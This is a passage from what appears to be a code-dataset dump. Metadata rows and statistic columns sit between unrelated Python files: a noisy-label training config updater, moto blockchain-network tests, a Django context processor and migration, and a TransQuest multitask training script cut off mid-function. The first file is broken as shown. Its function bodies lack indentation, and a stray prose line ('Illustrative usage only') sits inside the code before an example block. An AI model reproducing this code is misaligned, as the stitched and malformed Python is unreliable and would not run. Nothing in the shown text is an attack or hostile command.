87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 6
|
2021-11-01T09:28:13.000Z
|
2022-02-11T09:49:58.000Z
|
papers/ICCV2021-NGC/configs/_updater.py
|
huang-ziyuan/EssentialMC2
|
87141df94c1ac8e426ceec071720b97f5b9d3b88
|
[
"MIT"
] | 16
|
2021-11-11T06:26:18.000Z
|
2022-03-20T13:32:15.000Z
|
def update_data(hyper_params):
return dict(
train=dict(
samples_per_gpu=hyper_params['batch_size'],
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name'],
noise_mode=hyper_params['noise_mode'],
noise_ratio=hyper_params['noise_ratio']
)
),
test=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name']
)
),
eval=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
)
)
def update_openset_data(hyper_params):
return dict(
train=dict(
samples_per_gpu=hyper_params['batch_size'],
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name'],
noise_mode=hyper_params['noise_mode'],
noise_ratio=hyper_params['noise_ratio'],
ood_noise_name=hyper_params['ood_noise_name'],
ood_noise_root_dir=hyper_params['ood_noise_root_dir'],
ood_noise_num=hyper_params['ood_noise_num_train']
)
),
test=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
dataset=dict(
root_dir=hyper_params['dataset_root'],
cifar_type=hyper_params['dataset_name'],
ood_noise_name=hyper_params['ood_noise_name'],
ood_noise_root_dir=hyper_params['ood_noise_root_dir'],
ood_noise_num=hyper_params['ood_noise_num_test']
)
),
eval=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
)
)
def update_webvision_data(hyper_params):
return dict(
train=dict(
samples_per_gpu=hyper_params['batch_size'],
workers_per_gpu=hyper_params['workers_per_gpu'],
),
test=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
),
eval=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=hyper_params['workers_per_gpu'],
),
imagenet=dict(
samples_per_gpu=hyper_params['batch_size'] * 4,
workers_per_gpu=8,
)
)
def update_model(hyper_params):
return dict(
head=dict(num_classes=hyper_params['num_classes'], out_feat_dim=hyper_params['feature_dim']),
num_classes=hyper_params['num_classes'],
alpha=hyper_params['alpha'],
data_parallel=hyper_params['data_parallel']
)
def update_solver(hyper_params):
return dict(
hyper_params=hyper_params,
optimizer=dict(lr=hyper_params['lr'], weight_decay=hyper_params.get('weight_decay') or 5e-4),
lr_scheduler=dict(T_max=hyper_params['max_epochs']),
max_epochs=hyper_params['max_epochs'],
)
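Illustrative usage only: the hyper-parameter keys are the ones the updater functions above index into; the values here are made up.
example_hyper_params = {
    'batch_size': 64,
    'workers_per_gpu': 4,
    'dataset_root': '/data/cifar',
    'dataset_name': 'cifar10',
    'noise_mode': 'sym',
    'noise_ratio': 0.5,
    'num_classes': 10,
    'feature_dim': 128,
    'alpha': 0.5,
    'data_parallel': False,
    'lr': 0.02,
    'max_epochs': 300,
}
# Each updater returns a config fragment keyed off these hyper-parameters.
data_cfg = update_data(example_hyper_params)
solver_cfg = update_solver(example_hyper_params)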
| 35.561224
| 101
| 0.604017
| 410
| 3,485
| 4.65122
| 0.129268
| 0.305716
| 0.109596
| 0.169376
| 0.807027
| 0.807027
| 0.774515
| 0.774515
| 0.774515
| 0.774515
| 0
| 0.004045
| 0.290674
| 3,485
| 97
| 102
| 35.927835
| 0.767395
| 0
| 0
| 0.640449
| 0
| 0
| 0.160402
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.05618
| false
| 0
| 0
| 0.05618
| 0.11236
| 0
| 0
| 0
| 0
| null | 1
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
4e15790175ea46572e34e3be68fe64ed79c3ce16
| 4,312
|
py
|
Python
|
tests/test_managedblockchain/test_managedblockchain_networks.py
|
nourishcare/moto
|
8d3d43da90be101216d16330aeacaf7bd1fff6f4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_managedblockchain/test_managedblockchain_networks.py
|
nourishcare/moto
|
8d3d43da90be101216d16330aeacaf7bd1fff6f4
|
[
"Apache-2.0"
] | null | null | null |
tests/test_managedblockchain/test_managedblockchain_networks.py
|
nourishcare/moto
|
8d3d43da90be101216d16330aeacaf7bd1fff6f4
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import unicode_literals
import boto3
import sure # noqa
from moto.managedblockchain.exceptions import BadRequestException
from moto import mock_managedblockchain
from . import helpers
@mock_managedblockchain
def test_create_network():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network(
Name="testnetwork1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.2",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
)
network_id = response["NetworkId"]
member_id = response["MemberId"]
network_id.should.match("n-[A-Z0-9]{26}")
member_id.should.match("m-[A-Z0-9]{26}")
# Find in full list
response = conn.list_networks()
mbcnetworks = response["Networks"]
mbcnetworks.should.have.length_of(1)
mbcnetworks[0]["Name"].should.equal("testnetwork1")
# Get network details
response = conn.get_network(NetworkId=network_id)
response["Network"]["Name"].should.equal("testnetwork1")
@mock_managedblockchain
def test_create_network_withopts():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.2",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
)
network_id = response["NetworkId"]
member_id = response["MemberId"]
network_id.should.match("n-[A-Z0-9]{26}")
member_id.should.match("m-[A-Z0-9]{26}")
# Find in full list
response = conn.list_networks()
mbcnetworks = response["Networks"]
mbcnetworks.should.have.length_of(1)
mbcnetworks[0]["Description"].should.equal("Test Network 1")
# Get network details
response = conn.get_network(NetworkId=network_id)
response["Network"]["Description"].should.equal("Test Network 1")
@mock_managedblockchain
def test_create_network_noframework():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network.when.called_with(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_VINYL",
FrameworkVersion="1.2",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
).should.throw(Exception, "Invalid request body")
@mock_managedblockchain
def test_create_network_badframeworkver():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.create_network.when.called_with(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.X",
FrameworkConfiguration=helpers.default_frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
).should.throw(
Exception, "Invalid version 1.X requested for framework HYPERLEDGER_FABRIC"
)
@mock_managedblockchain
def test_create_network_badedition():
conn = boto3.client("managedblockchain", region_name="us-east-1")
frameworkconfiguration = {"Fabric": {"Edition": "SUPER"}}
response = conn.create_network.when.called_with(
Name="testnetwork1",
Description="Test Network 1",
Framework="HYPERLEDGER_FABRIC",
FrameworkVersion="1.2",
FrameworkConfiguration=frameworkconfiguration,
VotingPolicy=helpers.default_votingpolicy,
MemberConfiguration=helpers.default_memberconfiguration,
).should.throw(Exception, "Invalid request body")
@mock_managedblockchain
def test_get_network_badnetwork():
conn = boto3.client("managedblockchain", region_name="us-east-1")
response = conn.get_network.when.called_with(
NetworkId="n-ABCDEFGHIJKLMNOP0123456789",
).should.throw(Exception, "Network n-ABCDEFGHIJKLMNOP0123456789 not found")
| 34.774194
| 83
| 0.726809
| 442
| 4,312
| 6.90724
| 0.192308
| 0.064199
| 0.047167
| 0.055028
| 0.835899
| 0.835899
| 0.75565
| 0.75565
| 0.75565
| 0.7396
| 0
| 0.021082
| 0.163961
| 4,312
| 123
| 84
| 35.056911
| 0.825798
| 0.018553
| 0
| 0.702128
| 0
| 0
| 0.182679
| 0.013251
| 0
| 0
| 0
| 0
| 0
| 1
| 0.06383
| false
| 0
| 0.06383
| 0
| 0.12766
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
9d6731737f2515afd78dfd4cf63cb4388f9b9e7a
| 119
|
py
|
Python
|
server/tomato/context_processors.py
|
dtcooper/tomato
|
a54aa3bc3858fa8ad377696f5275ac0c2103f33a
|
[
"MIT"
] | 1
|
2020-02-25T09:21:31.000Z
|
2020-02-25T09:21:31.000Z
|
server/tomato/context_processors.py
|
dtcooper/tomato
|
a54aa3bc3858fa8ad377696f5275ac0c2103f33a
|
[
"MIT"
] | null | null | null |
server/tomato/context_processors.py
|
dtcooper/tomato
|
a54aa3bc3858fa8ad377696f5275ac0c2103f33a
|
[
"MIT"
] | null | null | null |
from .client_server_constants import COLORS
def rotator_colors(request):
return {'ROTATOR_COLORS': dict(COLORS)}
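A context processor only takes effect once it is listed in the Django template settings. A typical settings.py entry is shown below; the dotted path is inferred from the module location above, not copied from this project's settings:
TEMPLATES = [
    {
        'BACKEND': 'django.template.backends.django.DjangoTemplates',
        'APP_DIRS': True,
        'OPTIONS': {
            'context_processors': [
                'django.template.context_processors.request',
                # Assumed dotted path for the processor defined above.
                'tomato.context_processors.rotator_colors',
            ],
        },
    },
]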
| 19.833333
| 43
| 0.781513
| 15
| 119
| 5.933333
| 0.733333
| 0.292135
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.12605
| 119
| 5
| 44
| 23.8
| 0.855769
| 0
| 0
| 0
| 0
| 0
| 0.117647
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.333333
| 0.333333
| 1
| 0
| 1
| 0
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 7
|
9de738b1ea882829fbff5abe96cfb8d93e90bfc0
| 1,511
|
py
|
Python
|
django/trebek/apps/trivia/migrations/0013_auto_20210527_1431.py
|
whutch/trebek
|
8f5d80a97c7d3aaf29a2faf43a63969cb4150449
|
[
"MIT"
] | 1
|
2021-06-06T12:06:31.000Z
|
2021-06-06T12:06:31.000Z
|
django/trebek/apps/trivia/migrations/0013_auto_20210527_1431.py
|
whutch/trebek
|
8f5d80a97c7d3aaf29a2faf43a63969cb4150449
|
[
"MIT"
] | 1
|
2021-04-03T17:03:21.000Z
|
2021-05-27T21:14:59.000Z
|
django/trebek/apps/trivia/migrations/0013_auto_20210527_1431.py
|
whutch/trebek
|
8f5d80a97c7d3aaf29a2faf43a63969cb4150449
|
[
"MIT"
] | null | null | null |
# Generated by Django 3.2.3 on 2021-05-27 19:31
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('trivia', '0012_auto_20201124_1702'),
]
operations = [
migrations.AlterField(
model_name='game',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='player',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='question',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='questioncategory',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='questionstate',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
migrations.AlterField(
model_name='userdata',
name='id',
field=models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID'),
),
]
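Migrations like the one above are what Django 3.2's makemigrations emits once a project (or app config) opts in to 64-bit primary keys. The usual trigger is a settings.py line like the following (a generic example, not taken from this project's settings):
# In settings.py: make BigAutoField the default primary-key type.
DEFAULT_AUTO_FIELD = 'django.db.models.BigAutoField'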
| 34.340909
| 111
| 0.605559
| 155
| 1,511
| 5.729032
| 0.283871
| 0.081081
| 0.168919
| 0.195946
| 0.737613
| 0.737613
| 0.737613
| 0.737613
| 0.737613
| 0.737613
| 0
| 0.028259
| 0.273991
| 1,511
| 43
| 112
| 35.139535
| 0.781222
| 0.029782
| 0
| 0.648649
| 1
| 0
| 0.07377
| 0.01571
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.027027
| 0
| 0.108108
| 0
| 0
| 0
| 0
| null | 0
| 0
| 1
| 0
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
d182eb75f003f809eb788df4e0ff6ea5348d128b
| 46,942
|
py
|
Python
|
transquest/training/run_multi.py
|
agesb/TransQuest
|
84fb49b2e8d3dfae6caacc378e9764e610452aad
|
[
"Apache-2.0"
] | null | null | null |
transquest/training/run_multi.py
|
agesb/TransQuest
|
84fb49b2e8d3dfae6caacc378e9764e610452aad
|
[
"Apache-2.0"
] | null | null | null |
transquest/training/run_multi.py
|
agesb/TransQuest
|
84fb49b2e8d3dfae6caacc378e9764e610452aad
|
[
"Apache-2.0"
] | null | null | null |
import pandas as pd
import matplotlib.pyplot as plt
import numpy as np
import wandb
from transformers import AutoTokenizer, AutoModelForSequenceClassification
from transformers import XLMRobertaTokenizer, XLMRobertaForMaskedLM
import torch
from torch.utils.data import Dataset
import requests
import tqdm
import regex
import scipy
import sklearn
import tokenizers
import sentencepiece
from nlp import Dataset
from tqdm import tqdm
import sys
import os
import errno
import shutil
from sklearn.metrics import mean_absolute_error
from sklearn.model_selection import train_test_split
from pathlib import Path
# Set random seed and device
SEED = 1
torch.manual_seed(SEED)
torch.cuda.manual_seed(SEED)
torch.backends.cudnn.deterministic = True
GPU = True
if GPU:
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
else:
device = torch.device("cpu")
print(f'Using {device}')
print(torch.cuda.get_device_name(0))
# Pandas Display settings
pd.set_option('display.max_rows', 500)
pd.set_option('display.max_colwidth', None)
from CODE.transquest.training.util.prep_data import load_MLQE_data, load_WikiMatrix_data, swap_sentence_pairs, get_sentence_length
from CODE.transquest.training.util.draw import draw_scatterplot_multitransquest, print_stat
from CODE.transquest.training.util.normalizer import fit, un_fit
from CODE.transquest.algo.sentence_level.multitransquest.evaluation import pearson_corr, spearman_corr, rmse
from CODE.transquest.algo.sentence_level.multitransquest.run_model import MultiTransQuestModel
from CODE.transquest.algo.sentence_level.multitransquest.grad_reversal import WeightGradientsFunc, WeightGradients, test_weight_gradients
from CODE.transquest.training.multitransquest_config import TEMP_DIRECTORY, DRIVE_FILE_ID, MODEL_NAME, \
GOOGLE_DRIVE, multitransquest_config, MODEL_TYPE, SEED, RESULT_FILE, RESULT_IMAGE, SUBMISSION_FILE
from CODE.transquest.algo.sentence_level.multitransquest.utils import sweep_config_to_sweep_values
def train_MultiTransQuest(data, language, n_heads, wandb_group=None, **kwargs):
assert language in ['EN-DE', 'EN-ZH', 'ET-EN', 'RO-EN', 'SI-EN', 'NE-EN', 'RU-EN', 'MULTI']
if "task_config" in kwargs:
task_config = kwargs.get("task_config")
multitransquest_config.update(task_config)
print('I am working with', MODEL_TYPE, MODEL_NAME)
if not os.path.exists(TEMP_DIRECTORY):
os.makedirs(TEMP_DIRECTORY)
# Unpack the datasets
train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs = data
# Normalise the labels
for i in range(len(train_dataframes)):
train_dataframes[i] = fit(train_dataframes[i], 'labels')
dev_dataframes[i] = fit(dev_dataframes[i], 'labels')
if multitransquest_config["evaluate_during_training"]:
if multitransquest_config["n_fold"] > 1:
from collections import defaultdict
dev_predictions_dict = defaultdict(list)
test_predictions_dict = defaultdict(list)
##dev_preds = np.zeros((len(dev), multitransquest_config["n_fold"]))
# test_preds = np.zeros((len(test), multitransquest_config["n_fold"]))
dev_preds = []
test_preds = []
for i in range(multitransquest_config["n_fold"]):
if os.path.exists(multitransquest_config['output_dir']) and os.path.isdir(
multitransquest_config['output_dir']):
shutil.rmtree(multitransquest_config['output_dir'])
model = MultiTransQuestModel(MODEL_TYPE, MODEL_NAME, wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(),
args=multitransquest_config, **kwargs)
train_dfs = []
eval_dfs = []
for df in train_dataframes:
train_df, eval_df = train_test_split(df, test_size=0.1, random_state=SEED * i)
train_dfs.append(train_df)
eval_dfs.append(eval_df)
model.train_model(train_dfs, eval_df=eval_dfs, multi_label=False)
model = MultiTransQuestModel(MODEL_TYPE, multitransquest_config["best_model_dir"],
wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(), args=multitransquest_config, **kwargs)
for head in range(n_heads):
result, model_outputs, wrong_predictions = model.eval_model(dev_dataframes[head], curr_task=head,
multi_label=False)
predictions, raw_outputs = model.predict(list_test_sentence_pairs[head], curr_task=head)
if multitransquest_config['num_labels'][head] == 1:
dev_predictions_dict[head].append(model_outputs)
else:
dev_predictions_dict[head].append(model_outputs[:, 0])
test_predictions_dict[head].append([predictions])
list_test_results = []
list_dev_results = []
for head in range(n_heads):
test_dataframes[head]['predictions'] = np.array(test_predictions_dict[head]).squeeze().mean(axis=0)
dev_dataframes[head]['predictions'] = np.array(dev_predictions_dict[head]).squeeze().mean(axis=0)
df_dev_results = un_fit(dev_dataframes[head], 'labels')
df_dev_results = un_fit(dev_dataframes[head], 'predictions')
df_test_results = un_fit(test_dataframes[head], 'predictions')
df_dev_results.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False,
encoding='utf-8')
draw_scatterplot_multitransquest(df_dev_results, 'labels', 'predictions',
os.path.join(TEMP_DIRECTORY, RESULT_IMAGE), language, curr_task=head)
print_stat(df_dev_results, 'labels', 'predictions')
list_test_results.append(df_test_results)
list_dev_results.append(df_dev_results)
else:
model = MultiTransQuestModel(MODEL_TYPE, MODEL_NAME, wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(),
args=multitransquest_config, **kwargs)
train_dfs = []
eval_dfs = []
for df in train_dataframes:
train_df, eval_df = train_test_split(df, test_size=0.1, random_state=SEED)
train_dfs.append(train_df)
eval_dfs.append(eval_df)
model.train_model(train_dfs, eval_df=eval_dfs, multi_label=False)
model = MultiTransQuestModel(MODEL_TYPE, multitransquest_config["best_model_dir"], wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(), args=multitransquest_config, **kwargs)
list_test_results = []
list_dev_results = []
for head in range(n_heads):
result, model_outputs, wrong_predictions = model.eval_model(dev_dataframes[head], curr_task=head,
multi_label=False)
predictions, raw_outputs = model.predict(list_test_sentence_pairs[head], curr_task=head)
if multitransquest_config['num_labels'][head] == 1:
dev_dataframes[head]['predictions'] = model_outputs
else:
dev_dataframes[head]['predictions'] = model_outputs[:, 0]
test_dataframes[head]['predictions'] = predictions
dev_head = un_fit(dev_dataframes[head], 'labels')
dev_head = un_fit(dev_dataframes[head], 'predictions')
test_head = un_fit(test_dataframes[head], 'predictions')
dev_head.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False,
encoding='utf-8')
draw_scatterplot_multitransquest(dev_head, 'labels', 'predictions',
os.path.join(TEMP_DIRECTORY, RESULT_IMAGE), language, curr_task=head)
print_stat(dev_head, 'labels', 'predictions')
list_test_results.append(test_head)
list_dev_results.append(dev_head)
else:
model = MultiTransQuestModel(MODEL_TYPE, MODEL_NAME, wandb_group=wandb_group,
use_cuda=torch.cuda.is_available(),
args=multitransquest_config, **kwargs)
model.train_model(train_dataframes, multi_label=False)
# Get evaluation and prediction per task
list_test_results = []
list_dev_results = []
for head in range(n_heads):
result, model_outputs, wrong_predictions = model.eval_model(dev_dataframes[head], curr_task=head,
multi_label=False)
predictions, raw_outputs = model.predict(list_test_sentence_pairs[head], curr_task=head)
if multitransquest_config['num_labels'][head] == 1:
dev_dataframes[head]['predictions'] = model_outputs
else:
dev_dataframes[head]['predictions'] = model_outputs[:, 0]
test_dataframes[head]['predictions'] = predictions
dev_head = un_fit(dev_dataframes[head], 'labels')
dev_head = un_fit(dev_head, 'predictions')
test_head = un_fit(test_dataframes[head], 'predictions')
dev_head.to_csv(os.path.join(TEMP_DIRECTORY, RESULT_FILE), header=True, sep='\t', index=False,
encoding='utf-8')
draw_scatterplot_multitransquest(dev_head, 'labels', 'predictions',
os.path.join(TEMP_DIRECTORY, RESULT_IMAGE), language, curr_task=head)
print_stat(dev_head, 'labels', 'predictions')
list_test_results.append(test_head)
list_dev_results.append(dev_head)
return list_test_results, list_dev_results
def multitask_mixed_labels(language = 'EN-DE', labels = ['DA', 'HTER'], wandb_group=None, is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
labels = sweep_config['labels']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for label in labels:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for label in labels:
# Load train, dev and test data with the corresponding label
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_mixed_languages(languages=["EN-DE", "RO-EN"], label= "DA", wandb_group="mixed_languages_multitask", is_sweeping=False, **kwargs):
if is_sweeping:
#wandb_group = SWEEP_CONFIG['parameters']['wandb_group']['values'][0]
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
languages = sweep_config['languages']
label = sweep_config['label']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for language in languages:
train, dev, test = load_MLQE_data(language=language, label=label,
prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, wandb_group,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
for language in languages:
train, dev, test = load_MLQE_data(language=language, label=label,
prep_for_training=True)
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language, n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_augmented_wiki_data(language="EN-DE", wandb_group="aug_data_multitask", label='DA', is_sweeping=False, **kwargs):
if is_sweeping:
print(wandb_group)
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
print(language)
label = sweep_config['label']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'WikiMatrix_Binary_Classification']
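# First head is trained on MLQE quality estimation data, the second on a WikiMatrix binary classification set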
for dataset in data:
if dataset == 'MLQE':
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
elif dataset == 'WikiMatrix_Binary_Classification':
if language == 'EN-DE':
file = 'ende_9000_aug_custom_pipeline.tsv'
elif language == 'EN-ZH':
file = 'wiki_enzh_9000.tsv'
train, dev, test = load_WikiMatrix_data(language=language, label=label,\
file=file, prep_for_training=True)
else:
print('Please specify which method should be used to load this dataset')
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes))
else:
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'WikiMatrix_Binary_Classification']
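# First head is trained on MLQE quality estimation data, the second on a WikiMatrix binary classification set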
for dataset in data:
if dataset == 'MLQE':
train, dev, test = load_MLQE_data(language=language, label=label, prep_for_training=True)
elif dataset == 'WikiMatrix_Binary_Classification':
if language == 'EN-DE':
file = 'ende_9000_aug_custom_pipeline.tsv'
elif language == 'EN-ZH':
file = 'wiki_enzh_9000.tsv'
train, dev, test = load_WikiMatrix_data(language=language, label=label, \
file=file, prep_for_training=True)
else:
print('Please specify which method should be used to load this dataset')
# Create test sentence pairs in the expected format
test_sentence_pairs = list(map(list, zip(test['text_a'].to_list(), test['text_b'].to_list())))
# Store dataframes and test sentence pairs
train_dataframes.append(train)
dev_dataframes.append(dev)
test_dataframes.append(test)
list_test_sentence_pairs.append(test_sentence_pairs)
data = [train_dataframes, dev_dataframes, test_dataframes, list_test_sentence_pairs]
test_preds_per_task, dev_preds_per_task = train_MultiTransQuest(data, language,
n_heads=len(train_dataframes), **kwargs)
return test_preds_per_task, dev_preds_per_task
def multitask_shuffled_MLQE_data(language="EN-DE", wandb_group="shu_MLQE_data_multitask", is_sweeping=False, **kwargs):
if is_sweeping:
with wandb.init(group=wandb_group) as run:
sweep_config = wandb.config
print('CONFIG', wandb.config)
language = sweep_config['language']
print(language)
label = sweep_config['label']
train_dataframes = []
dev_dataframes = []
test_dataframes = []
list_test_sentence_pairs = []
data = ['MLQE', 'MLQE_shuffle']
for dataset in data:
train, dev, test = load_MLQE_data(language=language, label='DA', prep_for_training=True)
if dataset == 'MLQE_shuffle':
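# Auxiliary binary task: original sentence pairs are labelled 1, pairs with a shuffled source sentence are labelled 0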
train["shuffled_text_a"] = train["text_a"].sample(frac=1, random_state=1).values
df_train_good = train[['text_a', 'text_b']].copy()
df_train_good['labels'] = np.ones(len(train)).astype(int)
df_train_good = df_train_good[:3500]
df_train_bad = train[['shuffled_text_a', 'text_b']].copy()
df_train_bad['labels'] = np.zeros(len(train)).astype(int)
df_train_bad = df_train_bad.rename(columns={"shuffled_text_a": "text_a"})
df_train_bad = df_train_bad[3500:]
train = pd.concat((df_train_good, df_train_bad), ignore_index=True)
train = train.sample(frac=1, random_state=1)
dev["shuffled_text_a"] = dev["text_a"].sample(frac=1, random_state=1).values
df_dev_good = dev[['text_a', 'text_b']].copy()
df_dev_good['labels'] = np.ones(len(dev)).astype(int)
df_dev_good = df_dev_good[:500]
df_dev_bad = dev[['shuffled_text_a', 'text_b']].copy()
df_dev_bad = df_dev_bad.rename(columns={"shuffled_text_a": "text_a"})
df_dev_bad['labels'] = np.zeros(len(dev)).astype(int)
df_dev_bad = df_dev_bad[500:]
dev = pd.concat((df_dev_good, df_dev_bad), ignore_index=True)
dev = dev.sample(frac=1, random_state=1)
test["shuffled_text_a"] = test["text_a"].sample(frac=1, random_state=1).values
df_test_good = test[['text_a', 'text_b']].copy()
df_test_good['labels'] = np.ones(len(test)).astype(int)
df_test_good = df_test_good[:500]
df_test_bad = test[['shuffled_text_a', 'text_b']].copy()
